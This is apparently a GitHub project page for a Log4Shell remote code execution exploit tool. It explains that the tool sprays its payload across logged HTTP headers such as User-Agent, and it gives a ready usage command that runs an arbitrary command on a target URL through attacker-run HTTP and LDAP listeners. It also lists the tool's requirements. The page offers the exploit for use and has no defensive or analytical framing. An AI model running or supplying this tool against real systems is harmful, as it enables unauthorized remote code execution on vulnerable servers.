Log4Shell RCE Exploit

asciicast

fully independent exploit does not require any 3rd party binaries. The exploit spraying the payload to all possible logged HTTP Headers such as X-Forwarding , Server-IP , User-Agent

Usage

python main.py -i lhost -u http://target:targetport -c "command_to_execute" -p lhttp_port -l lldap_port

Requirements

  • java-8-openjdk
  • pip install -r requirements.txt
  • python3.6+

GitHub

View Github